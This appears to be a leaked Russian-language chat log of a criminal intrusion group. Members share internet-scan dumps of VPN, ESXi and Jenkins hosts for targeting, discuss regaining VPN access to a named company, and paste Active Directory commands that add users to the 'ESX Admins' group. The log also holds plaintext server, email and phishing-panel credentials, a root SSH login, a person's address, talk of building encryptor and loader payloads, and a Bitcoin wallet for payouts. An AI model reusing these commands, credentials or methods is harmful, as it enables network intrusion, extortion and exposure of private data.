[2024-05-24 11:31:33] @lapa:matrix.bestflowers247.online: все все хватит
--------------------
[2024-05-24 11:31:35] @lapa:matrix.bestflowers247.online: ждем новые
--------------------
[2024-05-24 11:31:40] @usernamegg:matrix.bestflowers247.online: [00:13:37] vns10k -выгружает хосты шодан,: cisco shodan https://transfer.sh/fkpoPFD5xn/cisco_shodan.tar.gz
[17:47:44] AA: ++
[18:20:18] vns10k -выгружает хосты шодан,: cisco zoomeye & fofa https://transfer.sh/Ax5XYiAV5B/cisco_zoomeye&fofa.tar.gz
[18:34:10] AA: ++
[20:19:20] vns10k -выгружает хосты шодан,: esxi & vcenter shodan & fofa https://transfer.sh/MLN0md13Oj/esxi&vcenter_fofa_shodan.tar.gz
[22:03:19] AA: ++
[pending] : 2024-02-29
[02:50:55] vns10k -выгружает хосты шодан,: esxi zoomeye https://transfer.sh/8oTnLPmYu5/esxi_zoomeye.tar.gz
--------------------
[2024-05-24 11:31:55] @usernamegg:matrix.bestflowers247.online: [22:30:00] vns10k -выгружает хосты шодан,: jenkins fofa & shodan https://transfer.sh/L3JHK1We5D/jenkins_shodan&fofa.tar.gz
[pending] : 2024-03-02
[02:39:53] vns10k -выгружает хосты шодан,: sonicwall fofa https://transfer.sh/GB45dLdT1Q/sonicwall_fofa.tar.gz
[15:18:09] vns10k -выгружает хосты шодан,: sonicwall shodan https://transfer.sh/kEaPtf0f9O/sonicwall_shodan.tar.gz
[16:27:52] vns10k -выгружает хосты шодан,: jenkins us zoomeye https://transfer.sh/HRo2Rh3vel/Jenkins_US_zoomeye.tar.gz
[16:28:31] vns10k -выгружает хосты шодан,: sonicwall us zoomeye https://transfer.sh/cq1FSil1VD/sonicwall_us_zoomeye.tar.gz
[pending] : 2024-03-04
[16:15:51] vns10k -выгружает хосты шодан,: jenkins с зумай остальные страны https://transfer.sh/PF0jhiVjyB/Jenkins_ca&gb&de&au&ch&nz_zoomeye.tar.gz
[16:34:03] vns10k -выгружает хосты шодан,: соник с зумай канада https://transfer.sh/Ip5HYV3gwu/SonicWALL_CA_zoomeye.tar.gz
[19:25:18] vns10k -выгружает хосты шодан,: привет, трансфер лежит, не знаю какие файлы ты успел скачать, две выгрузки скинул в один архив https://oshi.at/AAXC
--------------------
[2024-05-24 11:31:58] @lapa:matrix.bestflowers247.online: `transfer.sh` походу сам сайт уже не работает
--------------------
[2024-05-24 11:31:58] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2024-05-24 11:32:29] @usernamegg:matrix.bestflowers247.online: oshi.at
--------------------
[2024-05-24 11:32:36] @usernamegg:matrix.bestflowers247.online: а этот вроде работал
--------------------
[2024-05-24 11:32:49] @usernamegg:matrix.bestflowers247.online: [22:59:27] vns10k -выгружает хосты шодан,: выгрузил остальные продукты соника с фофы https://oshi.at/Pnbn
по другим поисковикам нет такого разделения на сслвпн, там я выгрузил все продукты соника
--------------------
[2024-05-24 11:32:57] @usernamegg:matrix.bestflowers247.online: [11:22:17] vns10k -выгружает хосты шодан,: в архиве watchguard c фофы и шодана, софос юса и канада с шодана https://oshi.at/mSYE
--------------------
[2024-05-24 11:33:03] @usernamegg:matrix.bestflowers247.online: [16:34:30] vns10k -выгружает хосты шодан,: софос DE c шодана https://mega.nz/file/kzEnDDQA#iG6Yfrzkqm_PLRRuyvvbxOQtTfwVrDSHj7Lh5Ju-Dcs
--------------------
[2024-05-24 11:33:13] @usernamegg:matrix.bestflowers247.online: [21:17:16] vns10k -выгружает хосты шодан,: sophos страны gb au ch nz с шодан и все страны с фофы https://oshi.at/HMkD
[21:23:01] vns10k -выгружает хосты шодан,: paloalto c шодан и фофы https://oshi.at/PWjW
[pending] : 2024-03-07
[00:36:20] vns10k -выгружает хосты шодан,: watchguard c zoomeye https://oshi.at/nYYW
--------------------
[2024-05-24 11:36:11] @lapa:matrix.bestflowers247.online: ну ладно
--------------------
[2024-05-24 11:37:49] @usernamegg:matrix.bestflowers247.online: я позже проверю
--------------------
[2024-05-24 11:37:54] @usernamegg:matrix.bestflowers247.online: боюсь сейчас трогать
--------------------
[2024-05-24 11:38:15] @muaddib6:matrix.org: > <@usernameww:matrix.bestflowers247.online> sent a file.

Готово
--------------------
[2024-05-24 11:38:18] @usernameyy:matrix.bestflowers247.online: ну я проверил там всё норм)
--------------------
[2024-05-24 11:38:22] @usernameyy:matrix.bestflowers247.online: почему боишься))
--------------------
[2024-05-24 11:38:41] @muaddib6:matrix.org: 2.7z
--------------------
[2024-05-24 11:38:47] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 11:40:32] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> Я думаю завтра утром или сегодня ночью смогу восстановить доступ к впнке
>
> Cielo
> www.cielotalent.com
> (877) 797-3379
> 200 S Executive Dr Ste 400 Brookfield, Wisconsin 53005, United States
> HR & Staffing, Business Services
> Employees:1,001 - 5,000
> $1.5B

как вероятность что ты ее разбуишь ?
--------------------
[2024-05-24 11:41:31] @usernamecc:matrix.bestflowers247.online: ---
--------------------
[2024-05-24 11:41:32] @usernamecc:matrix.bestflowers247.online: ```
PUBLICENTER_tree.txt
http://temp.sh/QxrYi/syvGkWgN5B2hTdHXCK4MUDARp7axYucqJZwrbVtE.zip
syvGkWgN5B2hTdHXCK4MUDARp7axYucqJZwrbVtE.zip
extract pass : VsM4GakrKtJAfu5xpvRb2qjTYhwnCmHeL39ZQ8UX
```
--------------------
[2024-05-24 11:47:15] @nickolas:talks.icu: вероятность хорошая
--------------------
[2024-05-24 11:48:51] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> https://cpanel.eo4lbrnkfkrwnjukzolbwg4c5olrm263zo6i4eeiepciza7f3ctijpad.onion/login
> username: w2124
> passsword:  UtJ04Y7JRluuFxKqQn11lW
> ✅ Where i can get VPS/Domain with crypto?
> ✅ How can i add VPS?
> ✅ How can i link domain?

посмотри,изучи плз
--------------------
[2024-05-24 11:52:00] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-24 11:52:55] @usernamegg:matrix.bestflowers247.online: ```
Запросить кто входить в группу ESX admins:

shell net group "ESX Admins" /domain


Добавить админа в группу ESX admins:

shell net group "ESX Admins" adm-wloewen /add /domain


Поменять пароль админу:

shell net user rootadmin Pr1nt4M3 /active:yes /domain




shell net group "ESX Admins" /add /domain
shell net group "ESX Admins" /delete /domain
shell net group "ESX Admins" dcpedigo /add /domain
shell net group "ESX Admins" "Domain Admins" /add /domain
shell net group "ESX Admins" /domain
```

--------------------
[2024-05-24 12:02:17] @lapa:matrix.bestflowers247.online: чет пока не открывается линк
--------------------
[2024-05-24 12:02:46] @lapa:matrix.bestflowers247.online: меняю тор ноды, тоже не открывается, но может получится
--------------------
[2024-05-24 12:06:11] @lapa:matrix.bestflowers247.online: открылось, но снвоа авторизация не работает
--------------------
[2024-05-24 12:06:17] @lapa:matrix.bestflowers247.online: а не, все вошел
--------------------
[2024-05-24 12:06:20] @lapa:matrix.bestflowers247.online: тормозит просто все
--------------------
[2024-05-24 12:06:43] @lapa:matrix.bestflowers247.online: скоро поем и буду разбираться что там
--------------------
[2024-05-24 12:07:59] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 12:08:02] @usernamegg:matrix.bestflowers247.online: приятного
--------------------
[2024-05-24 12:17:12] @lapa:matrix.bestflowers247.online: позьму впску для теста
--------------------
[2024-05-24 12:17:20] @lapa:matrix.bestflowers247.online: хотя может у вас есть впнска и домен?
--------------------
[2024-05-24 12:26:34] @usernamegg:matrix.bestflowers247.online: какую нужно ?
--------------------
[2024-05-24 12:26:37] @usernamegg:matrix.bestflowers247.online: могу сделать
--------------------
[2024-05-24 12:26:45] @usernamegg:matrix.bestflowers247.online: скажи какую
--------------------
[2024-05-24 12:28:05] @lapa:matrix.bestflowers247.online: убунту
--------------------
[2024-05-24 12:28:08] @lapa:matrix.bestflowers247.online: с доменом
--------------------
[2024-05-24 12:28:28] @lapa:matrix.bestflowers247.online: with minimum 10 GB free space
--------------------
[2024-05-24 12:28:55] @lapa:matrix.bestflowers247.online: ну в панельке там есть гайт, вроде все хорошо расписано
--------------------
[2024-05-24 12:44:07] @n3auxaxl:matrix.collectionofmanager.space: Привет, добил потоки!
--------------------
[2024-05-24 12:44:15] @n3auxaxl:matrix.collectionofmanager.space: Быстренько все идет, даже очень)
--------------------
[2024-05-24 12:44:38] @n3auxaxl:matrix.collectionofmanager.space: Щас буду прикручивать к потокам уже само шифрование и все такое
--------------------
[2024-05-24 12:44:43] @n3auxaxl:matrix.collectionofmanager.space: сейф мод тоже окей работает
--------------------
[2024-05-24 12:44:54] @n3auxaxl:matrix.collectionofmanager.space: саму пику поднял
--------------------
[2024-05-24 12:45:03] @n3auxaxl:matrix.collectionofmanager.space: вечером инфру поставлю
--------------------
[2024-05-24 12:45:14] @n3auxaxl:matrix.collectionofmanager.space: и завтра уже буду делать нагрузки эти, чтобы выдавать и запускать по any desk
--------------------
[2024-05-24 12:45:31] @n3auxaxl:matrix.collectionofmanager.space: толкьо вопрос есть ,по поводу сокса
--------------------
[2024-05-24 12:45:35] @n3auxaxl:matrix.collectionofmanager.space: у вас есть x86?
--------------------
[2024-05-24 12:45:43] @n3auxaxl:matrix.collectionofmanager.space: у меня же только через пику x86 запускается
--------------------
[2024-05-24 12:45:53] @usernamegg:matrix.bestflowers247.online: ща скажу
--------------------
[2024-05-24 12:45:57] @n3auxaxl:matrix.collectionofmanager.space: +++
--------------------
[2024-05-24 12:45:58] @n3auxaxl:matrix.collectionofmanager.space: жду
--------------------
[2024-05-24 12:46:07] @usernamegg:matrix.bestflowers247.online: толкьо вопрос есть ,по поводу сокса
у нас есть x86?
--------------------
[2024-05-24 12:46:15] @n3auxaxl:matrix.collectionofmanager.space: чтобы я если что состряпал какой то быстрый функционал по инжекту
--------------------
[2024-05-24 12:46:19] @n3auxaxl:matrix.collectionofmanager.space: или что то придумал быстро
--------------------
[2024-05-24 12:46:25] @n3auxaxl:matrix.collectionofmanager.space: может лоадер какой то допонительный
--------------------
[2024-05-24 12:46:33] @usernameyy:matrix.bestflowers247.online: нет, с шеллкодом x86 проблемы
--------------------
[2024-05-24 12:46:36] @usernameyy:matrix.bestflowers247.online: я могу попробовать сделать
--------------------
[2024-05-24 12:46:45] @usernameyy:matrix.bestflowers247.online: сейчас надо?
--------------------
[2024-05-24 12:48:47] @usernamegg:matrix.bestflowers247.online: х64 ?
--------------------
[2024-05-24 12:49:05] @usernamett:matrix.bestflowers247.online: ```
==hosteons.com==
ultimatephilomena@finacenter.com
JYF4536*&V-MToH`$AzCV5

proxychains ssh root@89.117.2.54 = ultimateparlor.com
PASS: Vjh98_6BK54y_%$kjb6*hjb
```
--------------------
[2024-05-24 12:49:13] @usernamegg:matrix.bestflowers247.online: ```
==hosteons.com==
ultimatephilomena@finacenter.com
JYF4536*&V-MToH`$AzCV5

proxychains ssh root@89.117.2.54 = ultimateparlor.com
PASS: Vjh98_6BK54y_%$kjb6*hjb
```
--------------------
[2024-05-24 12:49:32] @usernamegg:matrix.bestflowers247.online: админка
сервер + домен
--------------------
[2024-05-24 12:49:34] @usernameyy:matrix.bestflowers247.online: ну x64 у нас есть и легко билдится
--------------------
[2024-05-24 12:49:40] @usernameyy:matrix.bestflowers247.online: сейчас x86 надо или не?
--------------------
[2024-05-24 12:50:01] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-24 12:53:23] @usernameyy:matrix.bestflowers247.online: дай айпи и порт куда сделать x86
--------------------
[2024-05-24 13:00:29] @lapa:matrix.bestflowers247.online: а где домен зареган?
--------------------
[2024-05-24 13:00:39] @lapa:matrix.bestflowers247.online: `ultimateparlor.com` вот этот
--------------------
[2024-05-24 13:00:58] @lapa:matrix.bestflowers247.online: image.png
--------------------
[2024-05-24 13:01:03] @lapa:matrix.bestflowers247.online: а то мне тут вот это нужно добавить
--------------------
[2024-05-24 13:02:58] @lapa:matrix.bestflowers247.online: мне короч нужен доступ туда, где этот домен зареган, чтобы внести изменения в днс
--------------------
[2024-05-24 13:21:27] @usernamegg:matrix.bestflowers247.online: аа
--------------------
[2024-05-24 13:21:34] @usernamegg:matrix.bestflowers247.online: я его отпустил
--------------------
[2024-05-24 13:22:34] @lapa:matrix.bestflowers247.online: он не появится уже до понедельника?
--------------------
[2024-05-24 13:23:30] @lapa:matrix.bestflowers247.online: `==hosteons.com==` тут я проверил. Там только сервер зареган
--------------------
[2024-05-24 13:23:47] @lapa:matrix.bestflowers247.online: домен видимо где-то в другом месте
--------------------
[2024-05-24 13:30:12] @usernameyy:matrix.bestflowers247.online: я офнусь тоже
--------------------
[2024-05-24 13:30:24] @lapa:matrix.bestflowers247.online: ладно, в любои случаи уже пятница и такое себе уже слать
--------------------
[2024-05-24 13:30:52] @lapa:matrix.bestflowers247.online: В понедельник-вторник тогда прошлем. Вроде я понял как там все настроить
--------------------
[2024-05-24 13:38:31] @lapa:matrix.bestflowers247.online: Офнусь пока что. До понедельника. Чуть что в тг
--------------------
[2024-05-24 13:40:20] @usernamett:matrix.bestflowers247.online: ```
==========================================================
24/05/2024

162.210.192.171:19823

Walton Fadel
Street	1126 Pacific Ave
City/Town	Santa Cruz
State/Province/Region	California
Zip/Postal Code	95060
Phone Number	(831) 420-1025
Country	United States

MAIL
ultimatephilomena@finacenter.com
Password: V-MToH`$Az

==hosteons.com==
ultimatephilomena@finacenter.com
JYF4536*&V-MToH`$AzCV5

proxychains ssh root@89.117.2.54 = ultimateparlor.com
PASS: Vjh98_6BK54y_%$kjb6*hjb


==shockhosting.net==
ultimatephilomena@finacenter.com
JYF4536*&V-MToH`$AzCV5

ultimateparlor.com = 89.117.2.54

==cloudflare.com==
ultimatephilomena@finacenter.com
JYF4536*&V-MToH`$AzCV5

==========================================================
```


--------------------
[2024-05-24 13:41:03] @usernamett:matrix.bestflowers247.online: если что попроси JJ я комп не выключу
--------------------
[2024-05-24 13:41:24] @usernamett:matrix.bestflowers247.online: * если что то не так я комп не выключу
--------------------
[2024-05-24 13:51:22] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 13:51:38] @usernamegg:matrix.bestflowers247.online: ```
==========================================================
24/05/2024

162.210.192.171:19823

Walton Fadel
Street	1126 Pacific Ave
City/Town	Santa Cruz
State/Province/Region	California
Zip/Postal Code	95060
Phone Number	(831) 420-1025
Country	United States

MAIL
ultimatephilomena@finacenter.com
Password: V-MToH`$Az

==hosteons.com==
ultimatephilomena@finacenter.com
JYF4536*&V-MToH`$AzCV5

proxychains ssh root@89.117.2.54 = ultimateparlor.com
PASS: Vjh98_6BK54y_%$kjb6*hjb


==shockhosting.net==
ultimatephilomena@finacenter.com
JYF4536*&V-MToH`$AzCV5

ultimateparlor.com = 89.117.2.54

==cloudflare.com==
ultimatephilomena@finacenter.com
JYF4536*&V-MToH`$AzCV5

==========================================================
```


--------------------
[2024-05-24 13:59:47] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2024-05-24 13:59:53] @usernamegg:matrix.bestflowers247.online: хороших выходных
--------------------
[2024-05-24 14:14:34] @tinker:matrix.bestflowers247.online: Босс, жду твоих комментариев по скрипту и ТЗ
--------------------
[2024-05-24 14:25:54] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-24 14:50:23] @n3auxaxl:matrix.collectionofmanager.space: а бывает у вас такое, что на тачке, на которой вы запускаете оперативной памяти меньше чем 4gb?
--------------------
[2024-05-24 14:50:33] @n3auxaxl:matrix.collectionofmanager.space: это для винды вопрос
--------------------
[2024-05-24 14:52:55] @lapa:matrix.bestflowers247.online: `https://0nline.ultimateparlor.com/?DOSK=Jexes` сделал
--------------------
[2024-05-24 14:53:50] @lapa:matrix.bestflowers247.online: на пн короч нужно сделать несолько линков
--------------------
[2024-05-24 14:55:06] @lapa:matrix.bestflowers247.online: `https://cpanel.eo4lbrnkfkrwnjukzolbwg4c5olrm263zo6i4eeiepciza7f3ctijpad.onion/moloch/sessions/list` ну и тут появились креды
--------------------
[2024-05-24 14:55:11] @lapa:matrix.bestflowers247.online: но еще проверьте 2аф
--------------------
[2024-05-24 15:00:49] @lapa:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> на пн короч нужно сделать несолько линков

пусть сделают 3 впски + домен
--------------------
[2024-05-24 15:02:28] @lapa:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> на пн короч нужно сделать несолько линков

* пусть сделают 3 впски + домен на понедельник
--------------------
[2024-05-24 15:02:45] @lapa:matrix.bestflowers247.online: и также мне нужен будет доступ к редактированию днс записей домена
--------------------
[2024-05-24 15:04:24] @lapa:matrix.bestflowers247.online: * `https://cpanel.eo4lbrnkfkrwnjukzolbwg4c5olrm263zo6i4eeiepciza7f3ctijpad.onion/moloch/sessions/list` ну и тут появились креды, которые ввел
--------------------
[2024-05-24 15:04:43] @lapa:matrix.bestflowers247.online: * пусть сделают 3 впски и домен на каждую на понедельник
--------------------
[2024-05-24 15:05:31] @lapa:matrix.bestflowers247.online: Вроде проверил. Офнусь. Погодо отличная. Солнце. Хочу прогуляться по улице)
--------------------
[2024-05-24 15:05:47] @lapa:matrix.bestflowers247.online: * Вроде проверил. Работает. Офнусь. Погодо отличная. Солнце. Хочу прогуляться по улице)
--------------------
[2024-05-24 15:11:01] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 18:15:18] @usernamehunter:matrix.bestflowers247.online: привет
--------------------
[2024-05-24 18:15:53] @usernamehunter:matrix.bestflowers247.online: +600
--------------------
[2024-05-24 18:16:01] @usernamehunter:matrix.bestflowers247.online: итого: 1900
--------------------
[2024-05-24 18:16:03] @usernamehunter:matrix.bestflowers247.online: кош bc1qhgp4rwh6w2rfjlghtx0vwkedjmyhcl7jnvu9md

--------------------
